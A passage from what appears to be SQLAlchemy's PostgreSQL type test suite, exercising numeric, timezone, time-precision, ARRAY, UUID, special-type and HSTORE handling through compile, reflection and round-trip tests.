                    psycopg2cffi.dialect())
        for dialect in dialects:
            typ = Numeric().dialect_impl(dialect)
            # Every PG numeric type OID must produce either the raw float or
            # an equivalent Decimal from the result processor.
            for code in base._INT_TYPES + base._FLOAT_TYPES + \
                    base._DECIMAL_TYPES:
                proc = typ.result_processor(dialect, code)
                val = 23.7
                if proc is not None:
                    val = proc(val)
                assert val in (23.7, decimal.Decimal("23.7"))
    @testing.provide_metadata
    def test_numeric_default(self):
        metadata = self.metadata
        # pg8000 appears to fail when the value is 0,
        # returns an int instead of decimal.
        t = Table('t', metadata,
            Column('id', Integer, primary_key=True),
            Column('nd', Numeric(asdecimal=True), default=1),
            Column('nf', Numeric(asdecimal=False), default=1),
            Column('fd', Float(asdecimal=True), default=1),
            Column('ff', Float(asdecimal=False), default=1),
        )
        metadata.create_all()
        r = t.insert().execute()
        # asdecimal=True must yield Decimal, asdecimal=False must yield float.
        row = t.select().execute().first()
        assert isinstance(row[1], decimal.Decimal)
        assert isinstance(row[2], float)
        assert isinstance(row[3], decimal.Decimal)
        assert isinstance(row[4], float)
        eq_(
            row,
            (1, decimal.Decimal("1"), 1, decimal.Decimal("1"), 1)
        )
class TimezoneTest(fixtures.TestBase):
    """Test timezone-aware datetimes.

    psycopg will return a datetime with a tzinfo attached to it, if
    postgresql returns it. python then will not let you compare a
    datetime with a tzinfo to a datetime that doesn't have one. this
    test illustrates two ways to have datetime types with and without
    timezone info.
    """
    # NOTE: this docstring previously appeared after '__backend__ = True',
    # where it was a no-op string expression rather than the class docstring
    # (a docstring must be the first statement in the class body).

    __backend__ = True
    __only_on__ = 'postgresql'

    @classmethod
    def setup_class(cls):
        global tztable, notztable, metadata
        metadata = MetaData(testing.db)

        # current_timestamp() in postgresql is assumed to return
        # TIMESTAMP WITH TIMEZONE
        tztable = Table(
            'tztable', metadata,
            Column(
                'id', Integer, primary_key=True),
            Column(
                'date', DateTime(
                    timezone=True), onupdate=func.current_timestamp()),
            Column('name', String(20)))
        notztable = Table(
            'notztable', metadata,
            Column(
                'id', Integer, primary_key=True),
            Column(
                'date', DateTime(
                    timezone=False), onupdate=cast(
                    func.current_timestamp(), DateTime(
                        timezone=False))),
            Column('name', String(20)))
        metadata.create_all()

    @classmethod
    def teardown_class(cls):
        metadata.drop_all()

    @testing.fails_on('postgresql+zxjdbc',
                      "XXX: postgresql+zxjdbc doesn't give a tzinfo back")
    def test_with_timezone(self):
        # get a date with a tzinfo
        somedate = \
            testing.db.connect().scalar(func.current_timestamp().select())
        assert somedate.tzinfo
        tztable.insert().execute(id=1, name='row1', date=somedate)
        row = select([tztable.c.date], tztable.c.id
                     == 1).execute().first()
        eq_(row[0], somedate)
        eq_(somedate.tzinfo.utcoffset(somedate),
            row[0].tzinfo.utcoffset(row[0]))
        result = tztable.update(tztable.c.id
                                == 1).returning(tztable.c.date).\
            execute(name='newname'
                    )
        row = result.first()
        assert row[0] >= somedate

    def test_without_timezone(self):
        # get a date without a tzinfo
        somedate = datetime.datetime(2005, 10, 20, 11, 52, 0, )
        assert not somedate.tzinfo
        notztable.insert().execute(id=1, name='row1', date=somedate)
        row = select([notztable.c.date], notztable.c.id
                     == 1).execute().first()
        eq_(row[0], somedate)
        eq_(row[0].tzinfo, None)
        result = notztable.update(notztable.c.id
                                  == 1).returning(notztable.c.date).\
            execute(name='newname'
                    )
        row = result.first()
        assert row[0] >= somedate
class TimePrecisionTest(fixtures.TestBase, AssertsCompiledSQL):
    """DDL compilation and reflection of PG TIME/TIMESTAMP precision and
    timezone qualifiers."""
    __dialect__ = postgresql.dialect()
    __prefer__ = 'postgresql'
    __backend__ = True
    def test_compile(self):
        # each temporal type must render its precision / WITH TIME ZONE
        # qualifiers exactly as PostgreSQL spells them
        specs = [
            (postgresql.TIME(), 'TIME WITHOUT TIME ZONE'),
            (postgresql.TIME(precision=5), 'TIME(5) WITHOUT TIME ZONE'),
            (postgresql.TIME(timezone=True, precision=5),
             'TIME(5) WITH TIME ZONE'),
            (postgresql.TIMESTAMP(), 'TIMESTAMP WITHOUT TIME ZONE'),
            (postgresql.TIMESTAMP(precision=5),
             'TIMESTAMP(5) WITHOUT TIME ZONE'),
            (postgresql.TIMESTAMP(timezone=True, precision=5),
             'TIMESTAMP(5) WITH TIME ZONE'),
        ]
        for coltype, ddl in specs:
            self.assert_compile(coltype, ddl)
    @testing.only_on('postgresql', 'DB specific feature')
    @testing.provide_metadata
    def test_reflection(self):
        # round-trip a table through CREATE + autoload and verify that
        # precision and timezone flags survive reflection
        meta = self.metadata
        Table(
            't1',
            meta,
            Column('c1', postgresql.TIME()),
            Column('c2', postgresql.TIME(precision=5)),
            Column('c3', postgresql.TIME(timezone=True, precision=5)),
            Column('c4', postgresql.TIMESTAMP()),
            Column('c5', postgresql.TIMESTAMP(precision=5)),
            Column('c6', postgresql.TIMESTAMP(timezone=True, precision=5)),
        ).create()
        reflected = Table('t1', MetaData(testing.db), autoload=True)
        # column name -> (expected precision, expected timezone flag)
        expected = {
            'c1': (None, False),
            'c2': (5, False),
            'c3': (5, True),
            'c4': (None, False),
            'c5': (5, False),
            'c6': (5, True),
        }
        for colname in sorted(expected):
            precision, tz = expected[colname]
            eq_(reflected.c[colname].type.precision, precision)
            eq_(reflected.c[colname].type.timezone, tz)
class ArrayTest(fixtures.TablesTest, AssertsExecutionResults):
    # Round-trip, operator, and slicing tests for postgresql.ARRAY,
    # including a TypeDecorator wrapping a 2-dimensional array.
    __only_on__ = 'postgresql'
    __backend__ = True
    __unsupported_on__ = 'postgresql+pg8000', 'postgresql+zxjdbc'
    @classmethod
    def define_tables(cls, metadata):
        class ProcValue(TypeDecorator):
            # Exercises bind/result processing over a 2-D Integer array:
            # +5 is applied to every element going in, -7 coming out, so a
            # full round trip nets -2 per element (see test_dimension).
            impl = postgresql.ARRAY(Integer, dimensions=2)
            def process_bind_param(self, value, dialect):
                if value is None:
                    return None
                return [
                    [x + 5 for x in v]
                    for v in value
                ]
            def process_result_value(self, value, dialect):
                if value is None:
                    return None
                return [
                    [x - 7 for x in v]
                    for v in value
                ]
        # 'arrtable' leaves dimensions unspecified; 'dim_arrtable' declares
        # dimensions=1 explicitly so the contains() tests run against both.
        Table('arrtable', metadata,
              Column('id', Integer, primary_key=True),
              Column('intarr', postgresql.ARRAY(Integer)),
              Column('strarr', postgresql.ARRAY(Unicode())),
              Column('dimarr', ProcValue)
              )
        Table('dim_arrtable', metadata,
              Column('id', Integer, primary_key=True),
              Column('intarr', postgresql.ARRAY(Integer, dimensions=1)),
              Column('strarr', postgresql.ARRAY(Unicode(), dimensions=1)),
              Column('dimarr', ProcValue)
              )
    def _fixture_456(self, table):
        # shared fixture: one row whose intarr is [4, 5, 6]
        testing.db.execute(
            table.insert(),
            intarr=[4, 5, 6]
        )
    def test_reflect_array_column(self):
        # autoload must reflect ARRAY columns with their item types intact
        metadata2 = MetaData(testing.db)
        tbl = Table('arrtable', metadata2, autoload=True)
        assert isinstance(tbl.c.intarr.type, postgresql.ARRAY)
        assert isinstance(tbl.c.strarr.type, postgresql.ARRAY)
        assert isinstance(tbl.c.intarr.type.item_type, Integer)
        assert isinstance(tbl.c.strarr.type.item_type, String)
    def test_insert_array(self):
        arrtable = self.tables.arrtable
        arrtable.insert().execute(intarr=[1, 2, 3], strarr=[util.u('abc'),
                                                            util.u('def')])
        results = arrtable.select().execute().fetchall()
        eq_(len(results), 1)
        eq_(results[0]['intarr'], [1, 2, 3])
        eq_(results[0]['strarr'], [util.u('abc'), util.u('def')])
    def test_array_where(self):
        # equality comparison against a full Python list in the WHERE clause
        arrtable = self.tables.arrtable
        arrtable.insert().execute(intarr=[1, 2, 3], strarr=[util.u('abc'),
                                                            util.u('def')])
        arrtable.insert().execute(intarr=[4, 5, 6], strarr=util.u('ABC'))
        results = arrtable.select().where(
            arrtable.c.intarr == [
                1,
                2,
                3]).execute().fetchall()
        eq_(len(results), 1)
        eq_(results[0]['intarr'], [1, 2, 3])
    def test_array_concat(self):
        # '+' on an ARRAY column renders PG array concatenation
        arrtable = self.tables.arrtable
        arrtable.insert().execute(intarr=[1, 2, 3],
                                  strarr=[util.u('abc'), util.u('def')])
        results = select([arrtable.c.intarr + [4, 5,
                                               6]]).execute().fetchall()
        eq_(len(results), 1)
        eq_(results[0][0], [1, 2, 3, 4, 5, 6, ])
    def test_array_comparison(self):
        arrtable = self.tables.arrtable
        arrtable.insert().execute(intarr=[1, 2, 3],
                                  strarr=[util.u('abc'), util.u('def')])
        results = select([arrtable.c.id]).\
            where(arrtable.c.intarr < [4, 5, 6]).execute()\
            .fetchall()
        eq_(len(results), 1)
        # NOTE(review): asserts the row's id is 3 — presumably sequence
        # state from earlier inserts in this class; verify against the
        # fixture lifecycle if this ever flakes.
        eq_(results[0][0], 3)
    def test_array_subtype_resultprocessor(self):
        # Unicode items inside an ARRAY must go through the Unicode result
        # processor, for both flat and nested (2-D) string arrays.
        arrtable = self.tables.arrtable
        arrtable.insert().execute(intarr=[4, 5, 6],
                                  strarr=[[util.ue('m\xe4\xe4')], [
                                      util.ue('m\xf6\xf6')]])
        arrtable.insert().execute(intarr=[1, 2, 3], strarr=[
            util.ue('m\xe4\xe4'), util.ue('m\xf6\xf6')])
        results = \
            arrtable.select(order_by=[arrtable.c.intarr]).execute().fetchall()
        eq_(len(results), 2)
        eq_(results[0]['strarr'], [util.ue('m\xe4\xe4'), util.ue('m\xf6\xf6')])
        eq_(results[1]['strarr'],
            [[util.ue('m\xe4\xe4')],
             [util.ue('m\xf6\xf6')]])
    def test_array_literal(self):
        eq_(
            testing.db.scalar(
                select([
                    postgresql.array([1, 2]) + postgresql.array([3, 4, 5])
                ])
            ), [1, 2, 3, 4, 5]
        )
    def test_array_literal_compare(self):
        eq_(
            testing.db.scalar(
                select([
                    postgresql.array([1, 2]) < [3, 4, 5]
                ])
            ), True
        )
    def test_array_getitem_single_type(self):
        # indexing a single element yields the item type...
        arrtable = self.tables.arrtable
        is_(arrtable.c.intarr[1].type._type_affinity, Integer)
        is_(arrtable.c.strarr[1].type._type_affinity, String)
    def test_array_getitem_slice_type(self):
        # ...while a slice yields another ARRAY
        arrtable = self.tables.arrtable
        is_(arrtable.c.intarr[1:3].type._type_affinity, postgresql.ARRAY)
        is_(arrtable.c.strarr[1:3].type._type_affinity, postgresql.ARRAY)
    def test_array_getitem_single_exec(self):
        # single-element read and UPDATE via index (PG arrays are 1-based)
        arrtable = self.tables.arrtable
        self._fixture_456(arrtable)
        eq_(
            testing.db.scalar(select([arrtable.c.intarr[2]])),
            5
        )
        testing.db.execute(
            arrtable.update().values({arrtable.c.intarr[2]: 7})
        )
        eq_(
            testing.db.scalar(select([arrtable.c.intarr[2]])),
            7
        )
    def test_undim_array_empty(self):
        # every array "contains" the empty array
        arrtable = self.tables.arrtable
        self._fixture_456(arrtable)
        eq_(
            testing.db.scalar(
                select([arrtable.c.intarr]).
                where(arrtable.c.intarr.contains([]))
            ),
            [4, 5, 6]
        )
    def test_array_getitem_slice_exec(self):
        # slice read and slice-assignment UPDATE
        arrtable = self.tables.arrtable
        testing.db.execute(
            arrtable.insert(),
            intarr=[4, 5, 6],
            strarr=[util.u('abc'), util.u('def')]
        )
        eq_(
            testing.db.scalar(select([arrtable.c.intarr[2:3]])),
            [5, 6]
        )
        testing.db.execute(
            arrtable.update().values({arrtable.c.intarr[2:3]: [7, 8]})
        )
        eq_(
            testing.db.scalar(select([arrtable.c.intarr[2:3]])),
            [7, 8]
        )
    def _test_undim_array_contains_typed_exec(self, struct):
        # contains() must accept any iterable shape; 'struct' converts the
        # operand (set / list / generator)
        arrtable = self.tables.arrtable
        self._fixture_456(arrtable)
        eq_(
            testing.db.scalar(
                select([arrtable.c.intarr]).
                where(arrtable.c.intarr.contains(struct([4, 5])))
            ),
            [4, 5, 6]
        )
    def test_undim_array_contains_set_exec(self):
        self._test_undim_array_contains_typed_exec(set)
    def test_undim_array_contains_list_exec(self):
        self._test_undim_array_contains_typed_exec(list)
    def test_undim_array_contains_generator_exec(self):
        self._test_undim_array_contains_typed_exec(
            lambda elem: (x for x in elem))
    def _test_dim_array_contains_typed_exec(self, struct):
        # same as above but against the explicitly-dimensioned table
        dim_arrtable = self.tables.dim_arrtable
        self._fixture_456(dim_arrtable)
        eq_(
            testing.db.scalar(
                select([dim_arrtable.c.intarr]).
                where(dim_arrtable.c.intarr.contains(struct([4, 5])))
            ),
            [4, 5, 6]
        )
    def test_dim_array_contains_set_exec(self):
        self._test_dim_array_contains_typed_exec(set)
    def test_dim_array_contains_list_exec(self):
        self._test_dim_array_contains_typed_exec(list)
    def test_dim_array_contains_generator_exec(self):
        self._test_dim_array_contains_typed_exec(
            lambda elem: (
                x for x in elem))
    def test_array_contained_by_exec(self):
        # <@ operator: column value contained by the given array
        arrtable = self.tables.arrtable
        with testing.db.connect() as conn:
            conn.execute(
                arrtable.insert(),
                intarr=[6, 5, 4]
            )
            eq_(
                conn.scalar(
                    select([arrtable.c.intarr.contained_by([4, 5, 6, 7])])
                ),
                True
            )
    def test_array_overlap_exec(self):
        # && operator: arrays share at least one element
        arrtable = self.tables.arrtable
        with testing.db.connect() as conn:
            conn.execute(
                arrtable.insert(),
                intarr=[4, 5, 6]
            )
            eq_(
                conn.scalar(
                    select([arrtable.c.intarr]).
                    where(arrtable.c.intarr.overlap([7, 6]))
                ),
                [4, 5, 6]
            )
    def test_array_any_exec(self):
        # ANY(): 5 equals some element of intarr
        arrtable = self.tables.arrtable
        with testing.db.connect() as conn:
            conn.execute(
                arrtable.insert(),
                intarr=[4, 5, 6]
            )
            eq_(
                conn.scalar(
                    select([arrtable.c.intarr]).
                    where(postgresql.Any(5, arrtable.c.intarr))
                ),
                [4, 5, 6]
            )
    def test_array_all_exec(self):
        # ALL() with an explicit operator: 4 <= every element of intarr
        arrtable = self.tables.arrtable
        with testing.db.connect() as conn:
            conn.execute(
                arrtable.insert(),
                intarr=[4, 5, 6]
            )
            eq_(
                conn.scalar(
                    select([arrtable.c.intarr]).
                    where(arrtable.c.intarr.all(4, operator=operators.le))
                ),
                [4, 5, 6]
            )
    @testing.provide_metadata
    def test_tuple_flag(self):
        # as_tuple=True returns (hashable) tuples instead of lists,
        # including for nested arrays
        metadata = self.metadata
        t1 = Table(
            't1', metadata,
            Column('id', Integer, primary_key=True),
            Column('data', postgresql.ARRAY(String(5), as_tuple=True)),
            Column(
                'data2',
                postgresql.ARRAY(
                    Numeric(asdecimal=False), as_tuple=True)
            )
        )
        metadata.create_all()
        testing.db.execute(
            t1.insert(), id=1, data=[
                "1", "2", "3"], data2=[
                5.4, 5.6])
        testing.db.execute(
            t1.insert(),
            id=2,
            data=[
                "4",
                "5",
                "6"],
            data2=[1.0])
        testing.db.execute(t1.insert(), id=3, data=[["4", "5"], ["6", "7"]],
                           data2=[[5.4, 5.6], [1.0, 1.1]])
        r = testing.db.execute(t1.select().order_by(t1.c.id)).fetchall()
        eq_(
            r,
            [
                (1, ('1', '2', '3'), (5.4, 5.6)),
                (2, ('4', '5', '6'), (1.0,)),
                (3, (('4', '5'), ('6', '7')), ((5.4, 5.6), (1.0, 1.1)))
            ]
        )
        # hashable
        eq_(
            set(row[1] for row in r),
            set([('1', '2', '3'), ('4', '5', '6'), (('4', '5'), ('6', '7'))])
        )
    def test_dimension(self):
        # ProcValue round trip: +5 on bind, -7 on result => net -2 per element
        arrtable = self.tables.arrtable
        testing.db.execute(arrtable.insert(), dimarr=[[1, 2, 3], [4, 5, 6]])
        eq_(
            testing.db.scalar(select([arrtable.c.dimarr])),
            [[-1, 0, 1], [2, 3, 4]]
        )
class TimestampTest(fixtures.TestBase, AssertsExecutionResults):
    """Smoke test: a literal ``timestamp`` expression round-trips as a
    Python datetime."""
    __only_on__ = 'postgresql'
    __backend__ = True
    def test_timestamp(self):
        conn = testing.db.connect()
        stmt = select([text("timestamp '2007-12-25'")])
        row = conn.execute(stmt).first()
        eq_(row[0], datetime.datetime(2007, 12, 25, 0, 0))
class SpecialTypesTest(fixtures.TestBase, ComparesTables, AssertsCompiledSQL):
    """test DDL and reflection of PG-specific types """
    __only_on__ = 'postgresql >= 8.3.0',
    __backend__ = True
    @classmethod
    def setup_class(cls):
        # Legacy-style suite: table is created once per class and shared
        # via module-level globals.
        global metadata, table
        metadata = MetaData(testing.db)
        # create these types so that we can issue
        # special SQL92 INTERVAL syntax
        class y2m(types.UserDefinedType, postgresql.INTERVAL):
            def get_col_spec(self):
                return "INTERVAL YEAR TO MONTH"
        class d2s(types.UserDefinedType, postgresql.INTERVAL):
            def get_col_spec(self):
                return "INTERVAL DAY TO SECOND"
        table = Table(
            'sometable', metadata,
            Column(
                'id', postgresql.UUID, primary_key=True),
            Column(
                'flag', postgresql.BIT),
            Column(
                'bitstring', postgresql.BIT(4)),
            Column('addr', postgresql.INET),
            Column('addr2', postgresql.MACADDR),
            Column('addr3', postgresql.CIDR),
            Column('doubleprec', postgresql.DOUBLE_PRECISION),
            Column('plain_interval', postgresql.INTERVAL),
            Column('year_interval', y2m()),
            Column('month_interval', d2s()),
            Column('precision_interval', postgresql.INTERVAL(
                precision=3)),
            Column('tsvector_document', postgresql.TSVECTOR))
        metadata.create_all()
        # cheat so that the "strict type check"
        # works
        # (reflection will report plain INTERVAL for the y2m/d2s columns,
        # so the expected table is patched after DDL has been emitted)
        table.c.year_interval.type = postgresql.INTERVAL()
        table.c.month_interval.type = postgresql.INTERVAL()
    @classmethod
    def teardown_class(cls):
        metadata.drop_all()
    def test_reflection(self):
        # autoload the table back and compare type-for-type against the
        # (patched) expected table
        m = MetaData(testing.db)
        t = Table('sometable', m, autoload=True)
        self.assert_tables_equal(table, t, strict_types=True)
        assert t.c.plain_interval.type.precision is None
        assert t.c.precision_interval.type.precision == 3
        assert t.c.bitstring.type.length == 4
    def test_bit_compile(self):
        pairs = [(postgresql.BIT(), 'BIT(1)'),
                 (postgresql.BIT(5), 'BIT(5)'),
                 (postgresql.BIT(varying=True), 'BIT VARYING'),
                 (postgresql.BIT(5, varying=True), 'BIT VARYING(5)'),
                 ]
        for type_, expected in pairs:
            self.assert_compile(type_, expected)
    @testing.provide_metadata
    def test_tsvector_round_trip(self):
        # PG normalizes tsvector input; the stored form is the
        # lexeme-sorted, quoted representation
        t = Table('t1', self.metadata, Column('data', postgresql.TSVECTOR))
        t.create()
        testing.db.execute(t.insert(), data="a fat cat sat")
        eq_(testing.db.scalar(select([t.c.data])), "'a' 'cat' 'fat' 'sat'")
        testing.db.execute(t.update(), data="'a' 'cat' 'fat' 'mat' 'sat'")
        eq_(testing.db.scalar(select([t.c.data])),
            "'a' 'cat' 'fat' 'mat' 'sat'")
    @testing.provide_metadata
    def test_bit_reflection(self):
        # BIT defaults to length 1; BIT VARYING without a length reflects
        # with length None
        metadata = self.metadata
        t1 = Table('t1', metadata,
                   Column('bit1', postgresql.BIT()),
                   Column('bit5', postgresql.BIT(5)),
                   Column('bitvarying', postgresql.BIT(varying=True)),
                   Column('bitvarying5', postgresql.BIT(5, varying=True)),
                   )
        t1.create()
        m2 = MetaData(testing.db)
        t2 = Table('t1', m2, autoload=True)
        eq_(t2.c.bit1.type.length, 1)
        eq_(t2.c.bit1.type.varying, False)
        eq_(t2.c.bit5.type.length, 5)
        eq_(t2.c.bit5.type.varying, False)
        eq_(t2.c.bitvarying.type.length, None)
        eq_(t2.c.bitvarying.type.varying, True)
        eq_(t2.c.bitvarying5.type.length, 5)
        eq_(t2.c.bitvarying5.type.varying, True)
class UUIDTest(fixtures.TestBase):
    """Test the bind/return values of the UUID type."""
    __only_on__ = 'postgresql >= 8.3'
    __backend__ = True
    @testing.fails_on(
        'postgresql+zxjdbc',
        'column "data" is of type uuid but expression '
        'is of type character varying')
    @testing.fails_on('postgresql+pg8000', 'No support for UUID type')
    def test_uuid_string(self):
        # as_uuid=False: values are sent/returned as strings
        import uuid
        self._test_round_trip(
            Table('utable', MetaData(),
                  Column('data', postgresql.UUID(as_uuid=False))
                  ),
            str(uuid.uuid4()),
            str(uuid.uuid4())
        )
    @testing.fails_on(
        'postgresql+zxjdbc',
        'column "data" is of type uuid but expression is '
        'of type character varying')
    @testing.fails_on('postgresql+pg8000', 'No support for UUID type')
    def test_uuid_uuid(self):
        # as_uuid=True: values are sent/returned as uuid.UUID objects
        import uuid
        self._test_round_trip(
            Table('utable', MetaData(),
                  Column('data', postgresql.UUID(as_uuid=True))
                  ),
            uuid.uuid4(),
            uuid.uuid4()
        )
    @testing.fails_on('postgresql+zxjdbc',
                      'column "data" is of type uuid[] but '
                      'expression is of type character varying')
    @testing.fails_on('postgresql+pg8000', 'No support for UUID type')
    def test_uuid_array(self):
        import uuid
        self._test_round_trip(
            Table(
                'utable', MetaData(),
                Column('data', postgresql.ARRAY(postgresql.UUID(as_uuid=True)))
            ),
            [uuid.uuid4(), uuid.uuid4()],
            [uuid.uuid4(), uuid.uuid4()],
        )
    @testing.fails_on('postgresql+zxjdbc',
                      'column "data" is of type uuid[] but '
                      'expression is of type character varying')
    @testing.fails_on('postgresql+pg8000', 'No support for UUID type')
    def test_uuid_string_array(self):
        import uuid
        self._test_round_trip(
            Table(
                'utable', MetaData(),
                Column(
                    'data',
                    postgresql.ARRAY(postgresql.UUID(as_uuid=False)))
            ),
            [str(uuid.uuid4()), str(uuid.uuid4())],
            [str(uuid.uuid4()), str(uuid.uuid4())],
        )
    def test_no_uuid_available(self):
        # as_uuid=True must raise when the Python uuid module is
        # unavailable; the dialect's module reference is patched and
        # restored around the assertion
        from sqlalchemy.dialects.postgresql import base
        uuid_type = base._python_UUID
        base._python_UUID = None
        try:
            assert_raises(
                NotImplementedError,
                postgresql.UUID, as_uuid=True
            )
        finally:
            base._python_UUID = uuid_type
    def setup(self):
        self.conn = testing.db.connect()
        # NOTE(review): the transaction handle is discarded and never
        # committed or rolled back; presumably the work is thrown away when
        # the connection closes in teardown — confirm against the test
        # harness's connection semantics.
        trans = self.conn.begin()
    def teardown(self):
        self.conn.close()
    def _test_round_trip(self, utable, value1, value2, exp_value2=None):
        # insert both values, then select rows != value1; exactly one row
        # (value2, or exp_value2 when the return form differs) must remain
        utable.create(self.conn)
        self.conn.execute(utable.insert(), {'data': value1})
        self.conn.execute(utable.insert(), {'data': value2})
        r = self.conn.execute(
            select([utable.c.data]).
            where(utable.c.data != value1)
        )
        if exp_value2:
            eq_(r.fetchone()[0], exp_value2)
        else:
            eq_(r.fetchone()[0], value2)
        eq_(r.fetchone(), None)
class HStoreTest(AssertsCompiledSQL, fixtures.TestBase):
    # SQL-compilation and bind/result-processor tests for the HSTORE type;
    # no database required.
    __dialect__ = 'postgresql'
    def setup(self):
        metadata = MetaData()
        self.test_table = Table('test_table', metadata,
                                Column('id', Integer, primary_key=True),
                                Column('hash', HSTORE)
                                )
        self.hashcol = self.test_table.c.hash
    def _test_where(self, whereclause, expected):
        # assert the WHERE fragment compiles to exactly 'expected'
        stmt = select([self.test_table]).where(whereclause)
        self.assert_compile(
            stmt,
            "SELECT test_table.id, test_table.hash FROM test_table "
            "WHERE %s" % expected
        )
    def _test_cols(self, colclause, expected, from_=True):
        # assert the column expression compiles to exactly 'expected';
        # from_=False for expressions that reference no table
        stmt = select([colclause])
        self.assert_compile(
            stmt,
            (
                "SELECT %s" +
                (" FROM test_table" if from_ else "")
            ) % expected
        )
    def test_bind_serialize_default(self):
        dialect = postgresql.dialect()
        proc = self.test_table.c.hash.type._cached_bind_processor(dialect)
        eq_(
            proc(util.OrderedDict([("key1", "value1"), ("key2", "value2")])),
            '"key1"=>"value1", "key2"=>"value2"'
        )
    def test_bind_serialize_with_slashes_and_quotes(self):
        # backslashes and double quotes must be escaped in the hstore text
        dialect = postgresql.dialect()
        proc = self.test_table.c.hash.type._cached_bind_processor(dialect)
        eq_(
            proc({'\\"a': '\\"1'}),
            '"\\\\\\"a"=>"\\\\\\"1"'
        )
    def test_parse_error(self):
        # malformed hstore text raises ValueError reporting the residual
        # and its position
        dialect = postgresql.dialect()
        proc = self.test_table.c.hash.type._cached_result_processor(
            dialect, None)
        assert_raises_message(
            ValueError,
            r'''After u?'\[\.\.\.\], "key1"=>"value1", ', could not parse '''
            '''residual at position 36: u?'crapcrapcrap, "key3"\[\.\.\.\]''',
            proc,
            '"key2"=>"value2", "key1"=>"value1", '
            'crapcrapcrap, "key3"=>"value3"'
        )
    def test_result_deserialize_default(self):
        dialect = postgresql.dialect()
        proc = self.test_table.c.hash.type._cached_result_processor(
            dialect, None)
        eq_(
            proc('"key2"=>"value2", "key1"=>"value1"'),
            {"key1": "value1", "key2": "value2"}
        )
    def test_result_deserialize_with_slashes_and_quotes(self):
        dialect = postgresql.dialect()
        proc = self.test_table.c.hash.type._cached_result_processor(
            dialect, None)
        eq_(
            proc('"\\\\\\"a"=>"\\\\\\"1"'),
            {'\\"a': '\\"1'}
        )
    def test_bind_serialize_psycopg2(self):
        # with native hstore support the type contributes no processor
        # (psycopg2 handles it); without it, the Python serializer is used
        from sqlalchemy.dialects.postgresql import psycopg2
        dialect = psycopg2.PGDialect_psycopg2()
        dialect._has_native_hstore = True
        proc = self.test_table.c.hash.type._cached_bind_processor(dialect)
        is_(proc, None)
        dialect = psycopg2.PGDialect_psycopg2()
        dialect._has_native_hstore = False
        proc = self.test_table.c.hash.type._cached_bind_processor(dialect)
        eq_(
            proc(util.OrderedDict([("key1", "value1"), ("key2", "value2")])),
            '"key1"=>"value1", "key2"=>"value2"'
        )
    def test_result_deserialize_psycopg2(self):
        # mirror of test_bind_serialize_psycopg2 for the result side
        from sqlalchemy.dialects.postgresql import psycopg2
        dialect = psycopg2.PGDialect_psycopg2()
        dialect._has_native_hstore = True
        proc = self.test_table.c.hash.type._cached_result_processor(
            dialect, None)
        is_(proc, None)
        dialect = psycopg2.PGDialect_psycopg2()
        dialect._has_native_hstore = False
        proc = self.test_table.c.hash.type._cached_result_processor(
            dialect, None)
        eq_(
            proc('"key2"=>"value2", "key1"=>"value1"'),
            {"key1": "value1", "key2": "value2"}
        )
    def test_where_has_key(self):
        self._test_where(
            # hide from 2to3
            getattr(self.hashcol, 'has_key')('foo'),
            "test_table.hash ? %(hash_1)s"
        )
    def test_where_has_all(self):
        self._test_where(
            self.hashcol.has_all(postgresql.array(['1', '2'])),
            "test_table.hash ?& ARRAY[%(param_1)s, %(param_2)s]"
        )
    def test_where_has_any(self):
        self._test_where(
            self.hashcol.has_any(postgresql.array(['1', '2'])),
            "test_table.hash ?| ARRAY[%(param_1)s, %(param_2)s]"
        )
    def test_where_defined(self):
        self._test_where(
            self.hashcol.defined('foo'),
            "defined(test_table.hash, %(param_1)s)"
        )
    def test_where_contains(self):
        self._test_where(
            self.hashcol.contains({'foo': '1'}),
            "test_table.hash @> %(hash_1)s"
        )
    def test_where_contained_by(self):
        self._test_where(
            self.hashcol.contained_by({'foo': '1', 'bar': None}),
            "test_table.hash <@ %(hash_1)s"
        )
    def test_where_getitem(self):
        self._test_where(
            self.hashcol['bar'] == None,
            "(test_table.hash -> %(hash_1)s) IS NULL"
        )
    def test_cols_get(self):
        self._test_cols(
            self.hashcol['foo'],
            "test_table.hash -> %(hash_1)s AS anon_1",
            True
        )
    def test_cols_delete_single_key(self):
        self._test_cols(
            self.hashcol.delete('foo'),
            "delete(test_table.hash, %(param_1)s) AS delete_1",
            True
        )
    def test_cols_delete_array_of_keys(self):
        self._test_cols(
            self.hashcol.delete(postgresql.array(['foo', 'bar'])),
            ("delete(test_table.hash, ARRAY[%(param_1)s, %(param_2)s]) "
             "AS delete_1"),
            True
        )
    def test_cols_delete_matching_pairs(self):
        self._test_cols(
            self.hashcol.delete(hstore('1', '2')),
            ("delete(test_table.hash, hstore(%(param_1)s, %(param_2)s)) "
             "AS delete_1"),
            True
        )
    def test_cols_slice(self):
        self._test_cols(
            self.hashcol.slice(postgresql.array(['1', '2'])),
            ("slice(test_table.hash, ARRAY[%(param_1)s, %(param_2)s]) "
             "AS slice_1"),
            True
        )
    def test_cols_hstore_pair_text(self):
        self._test_cols(
            hstore('foo', '3')['foo'],
            "hstore(%(param_1)s, %(param_2)s) -> %(hstore_1)s AS anon_1",
            False
        )
    def test_cols_hstore_pair_array(self):
        self._test_cols(
            hstore(postgresql.array(['1', '2']),
                   postgresql.array(['3', None]))['1'],
            ("hstore(ARRAY[%(param_1)s, %(param_2)s], "
             "ARRAY[%(param_3)s, NULL]) -> %(hstore_1)s AS anon_1"),
            False
        )
    def test_cols_hstore_single_array(self):
        self._test_cols(
            hstore(postgresql.array(['1', '2', '3', None]))['3'],
            ("hstore(ARRAY[%(param_1)s, %(param_2)s, %(param_3)s, NULL]) "
             "-> %(hstore_1)s AS anon_1"),
            False
        )
    def test_cols_concat(self):
        self._test_cols(
            self.hashcol.concat(hstore(cast(self.test_table.c.id, Text), '3')),
            ("test_table.hash || hstore(CAST(test_table.id AS TEXT), "
             "%(param_1)s) AS anon_1"),
            True
        )
    def test_cols_concat_op(self):
        self._test_cols(
            hstore('foo', 'bar') + self.hashcol,
            "hstore(%(param_1)s, %(param_2)s) || test_table.hash AS anon_1",
            True
        )
    def test_cols_concat_get(self):
        self._test_cols(
            (self.hashcol + self.hashcol)['foo'],
            "test_table.hash || test_table.hash -> %(param_1)s AS anon_1"
        )
    def test_cols_keys(self):
        self._test_cols(
            # hide from 2to3
            getattr(self.hashcol, 'keys')(),
            "akeys(test_table.hash) AS akeys_1",
            True
        )
    def test_cols_vals(self):
        self._test_cols(
            self.hashcol.vals(),
            "avals(test_table.hash) AS avals_1",
            True
        )
    def test_cols_array(self):
        self._test_cols(
            self.hashcol.array(),
            "hstore_to_array(test_table.hash) AS hstore_to_array_1",
            True
        )
    def test_cols_matrix(self):
        self._test_cols(
            self.hashcol.matrix(),
